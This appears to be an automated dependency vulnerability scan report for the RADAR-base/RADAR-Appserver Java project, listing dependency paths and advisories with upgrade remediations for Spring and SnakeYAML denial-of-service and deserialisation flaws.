Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via static resource resolution. An attacker can cause denial of service by sending crafted requests that are slow to resolve when accessing file-system-backed static resources, causing HTTP connections to remain occupied and exhausting server resources.
Note: This is only exploitable if all the following are true:
The application uses Spring MVC or Spring WebFlux.
Static resources are served from the file system.
The application is running on Windows.
Remediation
Upgrade org.springframework:spring-core to version 6.2.18, 7.0.7 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Denial of Service (DoS) in the form of improper ETag prefix validation when parsing ETags from the If-Match or If-None-Match request headers. An attacker can exploit this vulnerability to cause denial of service by sending a maliciously crafted conditional HTTP request.
Workaround
Users of older, unsupported versions could enforce a size limit on If-Match and If-None-Match headers, e.g. through a Filter.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-web to version 5.3.38, 6.0.23, 6.1.12 or higher.
References
medium severity
- Vulnerable module: org.yaml:snakeyaml
- Introduced through: org.liquibase:liquibase-core@4.20.0, org.liquibase.ext:liquibase-hibernate6@4.20.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase:liquibase-core@4.20.0 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.liquibase:liquibase-core@4.21.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.liquibase:liquibase-core@4.20.0 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.liquibase.ext:liquibase-hibernate6@4.21.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0.
Overview
org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.
Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.
The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.
Remediation
Upgrade org.yaml:snakeyaml to version 2.0 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
